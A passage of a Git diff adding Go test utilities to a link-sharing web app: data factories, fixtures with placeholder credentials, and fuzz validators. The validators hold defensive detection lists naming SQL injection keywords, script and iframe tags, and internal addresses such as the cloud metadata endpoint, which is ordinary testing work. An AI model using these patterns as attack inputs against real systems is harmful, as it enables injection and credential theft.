users[i] = f.NewUserBuilder().
|
||||
WithID(uint(i + 1)).
|
||||
WithUsername(fmt.Sprintf("user%d", i+1)).
|
||||
WithEmail(fmt.Sprintf("user%d@example.com", i+1)).
|
||||
Build()
|
||||
}
|
||||
return users
|
||||
}
|
||||
|
||||
func (f *TestDataFactory) CreateTestPosts(count int) []*database.Post {
|
||||
posts := make([]*database.Post, count)
|
||||
for i := 0; i < count; i++ {
|
||||
posts[i] = f.NewPostBuilder().
|
||||
WithID(uint(i+1)).
|
||||
WithTitle(fmt.Sprintf("Post %d", i+1)).
|
||||
WithURL(fmt.Sprintf("https://example.com/post%d", i+1)).
|
||||
WithContent(fmt.Sprintf("Content for post %d", i+1)).
|
||||
WithAuthorID(uint((i%10)+1)).
|
||||
WithVotes(i%10, i%5).
|
||||
Build()
|
||||
}
|
||||
return posts
|
||||
}
|
||||
|
||||
func (f *TestDataFactory) CreateTestVotes(count int) []*database.Vote {
|
||||
votes := make([]*database.Vote, count)
|
||||
for i := range count {
|
||||
voteType := database.VoteUp
|
||||
if i%3 == 0 {
|
||||
voteType = database.VoteDown
|
||||
} else if i%5 == 0 {
|
||||
voteType = database.VoteNone
|
||||
}
|
||||
|
||||
votes[i] = f.NewVoteBuilder().
|
||||
WithID(uint(i + 1)).
|
||||
WithType(voteType).
|
||||
WithUserID(uint((i % 20) + 1)).
|
||||
WithPostID(uint((i % 100) + 1)).
|
||||
Build()
|
||||
}
|
||||
return votes
|
||||
}
|
||||
|
||||
func (f *TestDataFactory) CreateTestAuthResults(count int) []*AuthResult {
|
||||
results := make([]*AuthResult, count)
|
||||
for i := 0; i < count; i++ {
|
||||
results[i] = f.NewAuthResultBuilder().
|
||||
WithUser(f.NewUserBuilder().
|
||||
WithID(uint(i + 1)).
|
||||
WithUsername(fmt.Sprintf("user%d", i+1)).
|
||||
Build()).
|
||||
WithAccessToken(fmt.Sprintf("token_%d", i+1)).
|
||||
Build()
|
||||
}
|
||||
return results
|
||||
}
|
||||
|
||||
func (f *TestDataFactory) CreateTestVoteRequests(count int) []VoteRequest {
|
||||
requests := make([]VoteRequest, count)
|
||||
for i := 0; i < count; i++ {
|
||||
voteType := database.VoteUp
|
||||
if i%3 == 0 {
|
||||
voteType = database.VoteDown
|
||||
} else if i%5 == 0 {
|
||||
voteType = database.VoteNone
|
||||
}
|
||||
|
||||
requests[i] = f.NewVoteRequestBuilder().
|
||||
WithType(voteType).
|
||||
WithUserID(uint((i % 20) + 1)).
|
||||
WithPostID(uint((i % 100) + 1)).
|
||||
WithIPAddress(fmt.Sprintf("192.168.1.%d", (i%254)+1)).
|
||||
WithUserAgent(fmt.Sprintf("test-agent-%d", i+1)).
|
||||
Build()
|
||||
}
|
||||
return requests
|
||||
}
|
||||
|
||||
func uintPtr(u uint) *uint {
|
||||
return &u
|
||||
}
|
||||
|
||||
type E2ETestDataFactory struct {
|
||||
UserRepo repositories.UserRepository
|
||||
PostRepo repositories.PostRepository
|
||||
}
|
||||
|
||||
func NewE2ETestDataFactory(userRepo repositories.UserRepository, postRepo repositories.PostRepository) *E2ETestDataFactory {
|
||||
return &E2ETestDataFactory{
|
||||
UserRepo: userRepo,
|
||||
PostRepo: postRepo,
|
||||
}
|
||||
}
|
||||
|
||||
type PostData struct {
|
||||
Title string
|
||||
URL string
|
||||
Content string
|
||||
}
|
||||
|
||||
func (f *E2ETestDataFactory) CreateUserWithPosts(t *testing.T, username, email, password string, posts []PostData) (*TestUser, []*TestPost) {
|
||||
t.Helper()
|
||||
|
||||
user := CreateE2ETestUser(t, f.UserRepo, username, email, password)
|
||||
|
||||
var createdPosts []*TestPost
|
||||
for i, postData := range posts {
|
||||
url := postData.URL
|
||||
if url == "" {
|
||||
url = fmt.Sprintf("https://example.com/post-%d-%d", user.ID, i+1)
|
||||
}
|
||||
|
||||
title := postData.Title
|
||||
if title == "" {
|
||||
title = fmt.Sprintf("Test Post %d", i+1)
|
||||
}
|
||||
|
||||
content := postData.Content
|
||||
if content == "" {
|
||||
content = fmt.Sprintf("Test content for post %d", i+1)
|
||||
}
|
||||
|
||||
post := &database.Post{
|
||||
Title: title,
|
||||
URL: url,
|
||||
Content: content,
|
||||
AuthorID: &user.ID,
|
||||
UpVotes: 0,
|
||||
DownVotes: 0,
|
||||
Score: 0,
|
||||
}
|
||||
|
||||
if err := f.PostRepo.Create(post); err != nil {
|
||||
t.Fatalf("Failed to create test post: %v", err)
|
||||
}
|
||||
|
||||
createdPost, err := f.PostRepo.GetByID(post.ID)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to fetch created post: %v", err)
|
||||
}
|
||||
|
||||
createdPosts = append(createdPosts, &TestPost{
|
||||
ID: createdPost.ID,
|
||||
Title: createdPost.Title,
|
||||
URL: createdPost.URL,
|
||||
Content: createdPost.Content,
|
||||
AuthorID: *createdPost.AuthorID,
|
||||
})
|
||||
}
|
||||
|
||||
return user, createdPosts
|
||||
}
|
||||
|
||||
func (f *E2ETestDataFactory) CreateMultipleUsers(t *testing.T, count int, usernamePrefix, emailPrefix, password string) []*TestUser {
|
||||
t.Helper()
|
||||
|
||||
if count <= 0 {
|
||||
t.Fatalf("count must be greater than 0, got %d", count)
|
||||
}
|
||||
|
||||
var users []*TestUser
|
||||
timestamp := time.Now().UnixNano()
|
||||
|
||||
for i := 0; i < count; i++ {
|
||||
uniqueID := timestamp + int64(i)
|
||||
username := fmt.Sprintf("%s%d", usernamePrefix, uniqueID)
|
||||
email := fmt.Sprintf("%s%d@example.com", emailPrefix, uniqueID)
|
||||
|
||||
userPassword := password
|
||||
if userPassword == "" {
|
||||
userPassword = "StrongPass123!"
|
||||
}
|
||||
|
||||
user := CreateE2ETestUser(t, f.UserRepo, username, email, userPassword)
|
||||
users = append(users, user)
|
||||
}
|
||||
|
||||
return users
|
||||
}
|
||||
|
||||
func (f *E2ETestDataFactory) CreateUserWithDefaultPosts(t *testing.T, username, email, password string, count int) (*TestUser, []*TestPost) {
|
||||
t.Helper()
|
||||
|
||||
if count <= 0 {
|
||||
count = 3
|
||||
}
|
||||
|
||||
posts := make([]PostData, count)
|
||||
for i := 0; i < count; i++ {
|
||||
posts[i] = PostData{
|
||||
Title: fmt.Sprintf("Default Post %d", i+1),
|
||||
URL: fmt.Sprintf("https://example.com/default-post-%d", i+1),
|
||||
Content: fmt.Sprintf("This is default post content number %d", i+1),
|
||||
}
|
||||
}
|
||||
|
||||
return f.CreateUserWithPosts(t, username, email, password, posts)
|
||||
}
|
||||
|
||||
func (f *E2ETestDataFactory) CreateUsersWithPosts(t *testing.T, count int, usernamePrefix, emailPrefix, password string, postsPerUser []PostData) map[uint]*UserWithPosts {
|
||||
t.Helper()
|
||||
|
||||
if count <= 0 {
|
||||
t.Fatalf("count must be greater than 0, got %d", count)
|
||||
}
|
||||
|
||||
users := f.CreateMultipleUsers(t, count, usernamePrefix, emailPrefix, password)
|
||||
|
||||
result := make(map[uint]*UserWithPosts)
|
||||
for _, user := range users {
|
||||
var createdPosts []*TestPost
|
||||
for i, postData := range postsPerUser {
|
||||
url := postData.URL
|
||||
if url == "" {
|
||||
url = fmt.Sprintf("https://example.com/post-%d-%d", user.ID, i+1)
|
||||
}
|
||||
|
||||
title := postData.Title
|
||||
if title == "" {
|
||||
title = fmt.Sprintf("Test Post %d for User %d", i+1, user.ID)
|
||||
}
|
||||
|
||||
content := postData.Content
|
||||
if content == "" {
|
||||
content = fmt.Sprintf("Test content for post %d", i+1)
|
||||
}
|
||||
|
||||
post := &database.Post{
|
||||
Title: title,
|
||||
URL: url,
|
||||
Content: content,
|
||||
AuthorID: &user.ID,
|
||||
UpVotes: 0,
|
||||
DownVotes: 0,
|
||||
Score: 0,
|
||||
}
|
||||
|
||||
if err := f.PostRepo.Create(post); err != nil {
|
||||
t.Fatalf("Failed to create test post: %v", err)
|
||||
}
|
||||
|
||||
createdPost, err := f.PostRepo.GetByID(post.ID)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to fetch created post: %v", err)
|
||||
}
|
||||
|
||||
createdPosts = append(createdPosts, &TestPost{
|
||||
ID: createdPost.ID,
|
||||
Title: createdPost.Title,
|
||||
URL: createdPost.URL,
|
||||
Content: createdPost.Content,
|
||||
AuthorID: *createdPost.AuthorID,
|
||||
})
|
||||
}
|
||||
|
||||
result[user.ID] = &UserWithPosts{
|
||||
User: user,
|
||||
Posts: createdPosts,
|
||||
}
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
type UserWithPosts struct {
|
||||
User *TestUser
|
||||
Posts []*TestPost
|
||||
}
|
||||
|
||||
func (f *E2ETestDataFactory) CreatePostForUser(t *testing.T, userID uint, postData PostData) *TestPost {
|
||||
t.Helper()
|
||||
|
||||
url := postData.URL
|
||||
if url == "" {
|
||||
url = fmt.Sprintf("https://example.com/post-%d-%d", userID, time.Now().UnixNano())
|
||||
}
|
||||
|
||||
title := postData.Title
|
||||
if title == "" {
|
||||
title = "Test Post"
|
||||
}
|
||||
|
||||
content := postData.Content
|
||||
if content == "" {
|
||||
content = "Test post content"
|
||||
}
|
||||
|
||||
post := &database.Post{
|
||||
Title: title,
|
||||
URL: url,
|
||||
Content: content,
|
||||
AuthorID: &userID,
|
||||
UpVotes: 0,
|
||||
DownVotes: 0,
|
||||
Score: 0,
|
||||
}
|
||||
|
||||
if err := f.PostRepo.Create(post); err != nil {
|
||||
t.Fatalf("Failed to create test post: %v", err)
|
||||
}
|
||||
|
||||
createdPost, err := f.PostRepo.GetByID(post.ID)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to fetch created post: %v", err)
|
||||
}
|
||||
|
||||
return &TestPost{
|
||||
ID: createdPost.ID,
|
||||
Title: createdPost.Title,
|
||||
URL: createdPost.URL,
|
||||
Content: createdPost.Content,
|
||||
AuthorID: *createdPost.AuthorID,
|
||||
}
|
||||
}
|
||||
452
internal/testutils/fixtures.go
Normal file
452
internal/testutils/fixtures.go
Normal file
@@ -0,0 +1,452 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"crypto/rand"
|
||||
"fmt"
|
||||
"math/big"
|
||||
"testing"
|
||||
|
||||
"golang.org/x/crypto/bcrypt"
|
||||
"gorm.io/gorm"
|
||||
"goyco/internal/database"
|
||||
)
|
||||
|
||||
type TestConfig struct {
|
||||
Database DatabaseConfig `json:"database"`
|
||||
Server ServerConfig `json:"server"`
|
||||
JWT JWTConfig `json:"jwt"`
|
||||
Email EmailConfig `json:"email"`
|
||||
RateLimit RateLimitConfig `json:"rate_limit"`
|
||||
Cache CacheConfig `json:"cache"`
|
||||
Security SecurityConfig `json:"security"`
|
||||
Logging LoggingConfig `json:"logging"`
|
||||
}
|
||||
|
||||
type DatabaseConfig struct {
|
||||
Driver string `json:"driver"`
|
||||
Host string `json:"host"`
|
||||
Port int `json:"port"`
|
||||
User string `json:"user"`
|
||||
Password string `json:"password"`
|
||||
DBName string `json:"dbname"`
|
||||
SSLMode string `json:"sslmode"`
|
||||
}
|
||||
|
||||
type ServerConfig struct {
|
||||
Host string `json:"host"`
|
||||
Port int `json:"port"`
|
||||
}
|
||||
|
||||
type JWTConfig struct {
|
||||
Secret string `json:"secret"`
|
||||
Expiration int `json:"expiration"`
|
||||
}
|
||||
|
||||
type EmailConfig struct {
|
||||
SMTPHost string `json:"smtp_host"`
|
||||
SMTPPort int `json:"smtp_port"`
|
||||
SMTPUsername string `json:"smtp_username"`
|
||||
SMTPPassword string `json:"smtp_password"`
|
||||
FromEmail string `json:"from_email"`
|
||||
FromName string `json:"from_name"`
|
||||
}
|
||||
|
||||
type RateLimitConfig struct {
|
||||
RequestsPerMinute int `json:"requests_per_minute"`
|
||||
BurstSize int `json:"burst_size"`
|
||||
}
|
||||
|
||||
type CacheConfig struct {
|
||||
Type string `json:"type"`
|
||||
}
|
||||
|
||||
type SecurityConfig struct {
|
||||
EnableCSRF bool `json:"enable_csrf"`
|
||||
CSRFSecret string `json:"csrf_secret"`
|
||||
EnableCORS bool `json:"enable_cors"`
|
||||
AllowedOrigins []string `json:"allowed_origins"`
|
||||
EnableRateLimit bool `json:"enable_rate_limit"`
|
||||
EnableCompression bool `json:"enable_compression"`
|
||||
}
|
||||
|
||||
type LoggingConfig struct {
|
||||
Level string `json:"level"`
|
||||
Format string `json:"format"`
|
||||
Output string `json:"output"`
|
||||
}
|
||||
|
||||
type TestFixtures struct {
|
||||
Users []*database.User
|
||||
Posts []*database.Post
|
||||
Votes []*database.Vote
|
||||
Config *TestConfig
|
||||
}
|
||||
|
||||
func NewTestFixtures(t *testing.T) *TestFixtures {
|
||||
t.Helper()
|
||||
|
||||
return &TestFixtures{
|
||||
Users: []*database.User{
|
||||
{
|
||||
Username: "testuser1",
|
||||
Email: "user1@test.local",
|
||||
Password: "SecurePass123!",
|
||||
EmailVerified: true,
|
||||
},
|
||||
{
|
||||
Username: "testuser2",
|
||||
Email: "user2@test.local",
|
||||
Password: "SecurePass456!",
|
||||
EmailVerified: true,
|
||||
},
|
||||
{
|
||||
Username: "unverified_user",
|
||||
Email: "unverified@test.local",
|
||||
Password: "SecurePass789!",
|
||||
EmailVerified: false,
|
||||
},
|
||||
},
|
||||
Posts: []*database.Post{
|
||||
{
|
||||
Title: "Test Post 1",
|
||||
URL: "https://example.com/post1",
|
||||
Content: "This is test content for post 1",
|
||||
UpVotes: 5,
|
||||
DownVotes: 1,
|
||||
Score: 4,
|
||||
},
|
||||
{
|
||||
Title: "Test Post 2",
|
||||
URL: "https://example.com/post2",
|
||||
Content: "This is test content for post 2",
|
||||
UpVotes: 3,
|
||||
DownVotes: 0,
|
||||
Score: 3,
|
||||
},
|
||||
},
|
||||
Votes: []*database.Vote{
|
||||
{
|
||||
Type: database.VoteUp,
|
||||
},
|
||||
{
|
||||
Type: database.VoteDown,
|
||||
},
|
||||
{
|
||||
Type: database.VoteNone,
|
||||
},
|
||||
},
|
||||
Config: &TestConfig{
|
||||
Database: DatabaseConfig{
|
||||
Driver: "sqlite",
|
||||
Host: ":memory:",
|
||||
Port: 0,
|
||||
User: "",
|
||||
Password: "",
|
||||
DBName: "test",
|
||||
SSLMode: "disable",
|
||||
},
|
||||
Server: ServerConfig{
|
||||
Host: "localhost",
|
||||
Port: 8080,
|
||||
},
|
||||
JWT: JWTConfig{
|
||||
Secret: "test-secret-key",
|
||||
Expiration: 24,
|
||||
},
|
||||
Email: EmailConfig{
|
||||
SMTPHost: "localhost",
|
||||
SMTPPort: 587,
|
||||
SMTPUsername: "test@example.com",
|
||||
SMTPPassword: "test-password",
|
||||
FromEmail: "test@example.com",
|
||||
FromName: "Test App",
|
||||
},
|
||||
RateLimit: RateLimitConfig{
|
||||
RequestsPerMinute: 60,
|
||||
BurstSize: 10,
|
||||
},
|
||||
Cache: CacheConfig{
|
||||
Type: "memory",
|
||||
},
|
||||
Security: SecurityConfig{
|
||||
EnableCSRF: true,
|
||||
CSRFSecret: "test-csrf-secret",
|
||||
EnableCORS: true,
|
||||
AllowedOrigins: []string{"http://localhost:3000"},
|
||||
EnableRateLimit: true,
|
||||
EnableCompression: true,
|
||||
},
|
||||
Logging: LoggingConfig{
|
||||
Level: "debug",
|
||||
Format: "json",
|
||||
Output: "stdout",
|
||||
},
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func CreateSecureTestUser(t *testing.T, db *gorm.DB, username, email string) *database.User {
|
||||
t.Helper()
|
||||
|
||||
if username == "" {
|
||||
username = generateSecureRandomString(8)
|
||||
}
|
||||
if email == "" {
|
||||
email = fmt.Sprintf("%s@test.local", username)
|
||||
}
|
||||
|
||||
password := generateSecurePassword()
|
||||
hashedPassword, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to hash password: %v", err)
|
||||
}
|
||||
|
||||
user := &database.User{
|
||||
Username: username,
|
||||
Email: email,
|
||||
Password: string(hashedPassword),
|
||||
EmailVerified: true,
|
||||
}
|
||||
|
||||
if err := db.Create(user).Error; err != nil {
|
||||
t.Fatalf("Failed to create test user: %v", err)
|
||||
}
|
||||
|
||||
return user
|
||||
}
|
||||
|
||||
func CreateSecureTestPost(t *testing.T, db *gorm.DB, authorID uint) *database.Post {
|
||||
t.Helper()
|
||||
|
||||
title := generateSecureRandomString(12)
|
||||
url := fmt.Sprintf("https://example.com/%s", generateSecureRandomString(8))
|
||||
content := fmt.Sprintf("Test content for %s", title)
|
||||
|
||||
post := &database.Post{
|
||||
Title: title,
|
||||
URL: url,
|
||||
Content: content,
|
||||
AuthorID: &authorID,
|
||||
UpVotes: 0,
|
||||
DownVotes: 0,
|
||||
Score: 0,
|
||||
}
|
||||
|
||||
if err := db.Create(post).Error; err != nil {
|
||||
t.Fatalf("Failed to create test post: %v", err)
|
||||
}
|
||||
|
||||
return post
|
||||
}
|
||||
|
||||
func CreateSecureTestVote(t *testing.T, db *gorm.DB, userID, postID uint, voteType database.VoteType) *database.Vote {
|
||||
t.Helper()
|
||||
|
||||
vote := &database.Vote{
|
||||
UserID: &userID,
|
||||
PostID: postID,
|
||||
Type: voteType,
|
||||
}
|
||||
|
||||
if err := db.Create(vote).Error; err != nil {
|
||||
t.Fatalf("Failed to create test vote: %v", err)
|
||||
}
|
||||
|
||||
return vote
|
||||
}
|
||||
|
||||
func (f *TestFixtures) CreateTestUsers(t *testing.T, db *gorm.DB) []*database.User {
|
||||
t.Helper()
|
||||
|
||||
var users []*database.User
|
||||
for _, userData := range f.Users {
|
||||
user := *userData
|
||||
|
||||
hashedPassword, err := bcrypt.GenerateFromPassword([]byte(user.Password), bcrypt.DefaultCost)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to hash password: %v", err)
|
||||
}
|
||||
user.Password = string(hashedPassword)
|
||||
|
||||
if err := db.Create(&user).Error; err != nil {
|
||||
t.Fatalf("Failed to create test user: %v", err)
|
||||
}
|
||||
users = append(users, &user)
|
||||
}
|
||||
|
||||
return users
|
||||
}
|
||||
|
||||
func (f *TestFixtures) CreateTestPosts(t *testing.T, db *gorm.DB, authorID uint) []*database.Post {
|
||||
t.Helper()
|
||||
|
||||
var posts []*database.Post
|
||||
for _, postData := range f.Posts {
|
||||
post := *postData
|
||||
post.AuthorID = &authorID
|
||||
|
||||
if err := db.Create(&post).Error; err != nil {
|
||||
t.Fatalf("Failed to create test post: %v", err)
|
||||
}
|
||||
posts = append(posts, &post)
|
||||
}
|
||||
|
||||
return posts
|
||||
}
|
||||
|
||||
func (f *TestFixtures) CreateTestVotes(t *testing.T, db *gorm.DB, userID, postID uint) []*database.Vote {
|
||||
t.Helper()
|
||||
|
||||
var votes []*database.Vote
|
||||
for _, voteData := range f.Votes {
|
||||
vote := *voteData
|
||||
vote.UserID = &userID
|
||||
vote.PostID = postID
|
||||
|
||||
if err := db.Create(&vote).Error; err != nil {
|
||||
t.Fatalf("Failed to create test vote: %v", err)
|
||||
}
|
||||
votes = append(votes, &vote)
|
||||
}
|
||||
|
||||
return votes
|
||||
}
|
||||
|
||||
func generateSecureRandomString(length int) string {
|
||||
const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
|
||||
result := make([]byte, length)
|
||||
|
||||
for i := range result {
|
||||
num, _ := rand.Int(rand.Reader, big.NewInt(int64(len(charset))))
|
||||
result[i] = charset[num.Int64()]
|
||||
}
|
||||
|
||||
return string(result)
|
||||
}
|
||||
|
||||
func generateSecurePassword() string {
|
||||
letters := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
numbers := "0123456789"
|
||||
special := "!@#$%^&*"
|
||||
|
||||
password := ""
|
||||
|
||||
num, _ := rand.Int(rand.Reader, big.NewInt(int64(len(letters))))
|
||||
password += string(letters[num.Int64()])
|
||||
|
||||
num, _ = rand.Int(rand.Reader, big.NewInt(int64(len(numbers))))
|
||||
password += string(numbers[num.Int64()])
|
||||
|
||||
num, _ = rand.Int(rand.Reader, big.NewInt(int64(len(special))))
|
||||
password += string(special[num.Int64()])
|
||||
|
||||
for len(password) < 12 {
|
||||
charset := letters + numbers + special
|
||||
num, _ := rand.Int(rand.Reader, big.NewInt(int64(len(charset))))
|
||||
password += string(charset[num.Int64()])
|
||||
}
|
||||
|
||||
return password
|
||||
}
|
||||
|
||||
func CleanupTestData(t *testing.T, db *gorm.DB) {
|
||||
t.Helper()
|
||||
|
||||
if err := db.Exec("DELETE FROM votes").Error; err != nil {
|
||||
t.Logf("Warning: Failed to clean up votes: %v", err)
|
||||
}
|
||||
if err := db.Exec("DELETE FROM posts").Error; err != nil {
|
||||
t.Logf("Warning: Failed to clean up posts: %v", err)
|
||||
}
|
||||
if err := db.Exec("DELETE FROM account_deletion_requests").Error; err != nil {
|
||||
t.Logf("Warning: Failed to clean up account deletion requests: %v", err)
|
||||
}
|
||||
if err := db.Exec("DELETE FROM users").Error; err != nil {
|
||||
t.Logf("Warning: Failed to clean up users: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func AssertUserExists(t *testing.T, db *gorm.DB, userID uint) {
|
||||
t.Helper()
|
||||
|
||||
var count int64
|
||||
if err := db.Model(&database.User{}).Where("id = ?", userID).Count(&count).Error; err != nil {
|
||||
t.Fatalf("Failed to check user existence: %v", err)
|
||||
}
|
||||
|
||||
if count == 0 {
|
||||
t.Errorf("Expected user with ID %d to exist", userID)
|
||||
}
|
||||
}
|
||||
|
||||
func AssertUserNotExists(t *testing.T, db *gorm.DB, userID uint) {
|
||||
t.Helper()
|
||||
|
||||
var count int64
|
||||
if err := db.Model(&database.User{}).Where("id = ?", userID).Count(&count).Error; err != nil {
|
||||
t.Fatalf("Failed to check user existence: %v", err)
|
||||
}
|
||||
|
||||
if count > 0 {
|
||||
t.Errorf("Expected user with ID %d to not exist", userID)
|
||||
}
|
||||
}
|
||||
|
||||
func AssertPostExists(t *testing.T, db *gorm.DB, postID uint) {
|
||||
t.Helper()
|
||||
|
||||
var count int64
|
||||
if err := db.Model(&database.Post{}).Where("id = ?", postID).Count(&count).Error; err != nil {
|
||||
t.Fatalf("Failed to check post existence: %v", err)
|
||||
}
|
||||
|
||||
if count == 0 {
|
||||
t.Errorf("Expected post with ID %d to exist", postID)
|
||||
}
|
||||
}
|
||||
|
||||
func AssertVoteExists(t *testing.T, db *gorm.DB, userID, postID uint) {
|
||||
t.Helper()
|
||||
|
||||
var count int64
|
||||
if err := db.Model(&database.Vote{}).Where("user_id = ? AND post_id = ?", userID, postID).Count(&count).Error; err != nil {
|
||||
t.Fatalf("Failed to check vote existence: %v", err)
|
||||
}
|
||||
|
||||
if count == 0 {
|
||||
t.Errorf("Expected vote for user %d and post %d to exist", userID, postID)
|
||||
}
|
||||
}
|
||||
|
||||
func GetUserCount(t *testing.T, db *gorm.DB) int64 {
|
||||
t.Helper()
|
||||
|
||||
var count int64
|
||||
if err := db.Model(&database.User{}).Count(&count).Error; err != nil {
|
||||
t.Fatalf("Failed to get user count: %v", err)
|
||||
}
|
||||
|
||||
return count
|
||||
}
|
||||
|
||||
func GetPostCount(t *testing.T, db *gorm.DB) int64 {
|
||||
t.Helper()
|
||||
|
||||
var count int64
|
||||
if err := db.Model(&database.Post{}).Count(&count).Error; err != nil {
|
||||
t.Fatalf("Failed to get post count: %v", err)
|
||||
}
|
||||
|
||||
return count
|
||||
}
|
||||
|
||||
func GetVoteCount(t *testing.T, db *gorm.DB) int64 {
|
||||
t.Helper()
|
||||
|
||||
var count int64
|
||||
if err := db.Model(&database.Vote{}).Count(&count).Error; err != nil {
|
||||
t.Fatalf("Failed to get vote count: %v", err)
|
||||
}
|
||||
|
||||
return count
|
||||
}
|
||||
381
internal/testutils/fuzz.go
Normal file
381
internal/testutils/fuzz.go
Normal file
@@ -0,0 +1,381 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"regexp"
|
||||
"strings"
|
||||
"unicode/utf8"
|
||||
)
|
||||
|
||||
type FuzzInputValidator struct {
|
||||
MaxInputLength int
|
||||
MinInputLength int
|
||||
}
|
||||
|
||||
func NewFuzzInputValidator() *FuzzInputValidator {
|
||||
return &FuzzInputValidator{
|
||||
MaxInputLength: 10000,
|
||||
MinInputLength: 0,
|
||||
}
|
||||
}
|
||||
|
||||
func (f *FuzzInputValidator) ValidateFuzzInput(data []byte) bool {
|
||||
if !utf8.Valid(data) {
|
||||
return false
|
||||
}
|
||||
|
||||
if len(data) < f.MinInputLength || len(data) > f.MaxInputLength {
|
||||
return false
|
||||
}
|
||||
|
||||
return true
|
||||
}
|
||||
|
||||
func (f *FuzzInputValidator) ValidateFuzzInputStrict(data []byte) bool {
|
||||
if !f.ValidateFuzzInput(data) {
|
||||
return false
|
||||
}
|
||||
|
||||
input := string(data)
|
||||
|
||||
if len(strings.TrimSpace(input)) == 0 {
|
||||
return false
|
||||
}
|
||||
|
||||
return true
|
||||
}
|
||||
|
||||
func ValidateUTF8String(s string) {
|
||||
if !utf8.ValidString(s) {
|
||||
panic("String contains invalid UTF-8")
|
||||
}
|
||||
}
|
||||
|
||||
func ValidateNoNullBytes(s string) {
|
||||
if strings.Contains(s, "\x00") {
|
||||
panic("String contains null bytes")
|
||||
}
|
||||
}
|
||||
|
||||
func ValidateNoScriptTags(s string) {
|
||||
if strings.Contains(strings.ToLower(s), "<script") {
|
||||
panic("String contains script tags")
|
||||
}
|
||||
}
|
||||
|
||||
func ValidateNoJavascriptProtocol(s string) {
|
||||
if strings.Contains(strings.ToLower(s), "javascript:") {
|
||||
panic("String contains javascript: protocol")
|
||||
}
|
||||
}
|
||||
|
||||
func ValidateNoDangerousChars(s string) {
|
||||
dangerousChars := []string{"<", ">", "\"", "'", "&", "|", ";", "`", "$", "(", ")", "{", "}", "[", "]", "\\", "/", "*", "?", "!", "@", "#", "%", "^", "~"}
|
||||
|
||||
for _, char := range dangerousChars {
|
||||
if strings.Contains(s, char) {
|
||||
panic("String contains dangerous character: " + char)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func ValidateNoDangerousHTMLTags(s string) {
|
||||
dangerousTags := []string{
|
||||
"<script", "</script>", "<iframe", "</iframe>", "<object", "</object>",
|
||||
"<embed", "</embed>", "<form", "</form>", "<input", "<button",
|
||||
"<link", "<meta", "<style", "</style>",
|
||||
}
|
||||
|
||||
for _, tag := range dangerousTags {
|
||||
if strings.Contains(strings.ToLower(s), tag) {
|
||||
panic("String contains dangerous HTML tag: " + tag)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func ValidateNoPrivateIPs(s string) {
|
||||
privateIPs := []string{
|
||||
"localhost", "127.0.0.1", "0.0.0.0", "10.", "172.", "192.168.", "169.254.169.254",
|
||||
}
|
||||
|
||||
for _, ip := range privateIPs {
|
||||
if strings.Contains(strings.ToLower(s), ip) {
|
||||
panic("String contains private IP: " + ip)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func ValidateNoSQLInjectionPatterns(s string) {
|
||||
sqlPatterns := []string{
|
||||
"';", "--", "/*", "*/", "xp_", "sp_", "exec", "execute",
|
||||
"union", "select", "insert", "update", "delete", "drop",
|
||||
"create", "alter", "grant", "revoke", "truncate",
|
||||
}
|
||||
|
||||
lowerS := strings.ToLower(s)
|
||||
for _, pattern := range sqlPatterns {
|
||||
if strings.Contains(lowerS, pattern) {
|
||||
panic("String contains SQL injection pattern: " + pattern)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func ValidateNoExcessiveRepetition(s string, maxRepeats int) {
|
||||
if hasRepeatedCharacters(s, maxRepeats) {
|
||||
panic("String contains excessive character repetition")
|
||||
}
|
||||
|
||||
words := strings.Fields(s)
|
||||
wordCount := make(map[string]int)
|
||||
for _, word := range words {
|
||||
wordCount[strings.ToLower(word)]++
|
||||
if wordCount[strings.ToLower(word)] > 3 {
|
||||
panic("String contains excessive word repetition")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func hasRepeatedCharacters(str string, maxRepeats int) bool {
|
||||
if len(str) <= maxRepeats {
|
||||
return false
|
||||
}
|
||||
|
||||
currentChar := rune(0)
|
||||
count := 0
|
||||
|
||||
for _, char := range str {
|
||||
if char == currentChar {
|
||||
count++
|
||||
if count > maxRepeats {
|
||||
return true
|
||||
}
|
||||
} else {
|
||||
currentChar = char
|
||||
count = 1
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
type FuzzJSONParser struct{}
|
||||
|
||||
func NewFuzzJSONParser() *FuzzJSONParser {
|
||||
return &FuzzJSONParser{}
|
||||
}
|
||||
|
||||
func (p *FuzzJSONParser) ParseJSON(data []byte) bool {
|
||||
var result map[string]any
|
||||
err := json.Unmarshal(data, &result)
|
||||
return err == nil
|
||||
}
|
||||
|
||||
func (p *FuzzJSONParser) ParseJSONWithValidation(data []byte) {
|
||||
var result map[string]any
|
||||
err := json.Unmarshal(data, &result)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
for key, value := range result {
|
||||
ValidateUTF8String(key)
|
||||
if str, ok := value.(string); ok {
|
||||
ValidateUTF8String(str)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
type FuzzHTTPRequest struct{}
|
||||
|
||||
func NewFuzzHTTPRequest() *FuzzHTTPRequest {
|
||||
return &FuzzHTTPRequest{}
|
||||
}
|
||||
|
||||
func (r *FuzzHTTPRequest) CreateTestRequest(method, url string, body []byte, headers map[string]string) *http.Request {
|
||||
var reqBody bytes.Buffer
|
||||
if body != nil {
|
||||
reqBody.Write(body)
|
||||
}
|
||||
|
||||
req := httptest.NewRequest(method, url, &reqBody)
|
||||
|
||||
for name, value := range headers {
|
||||
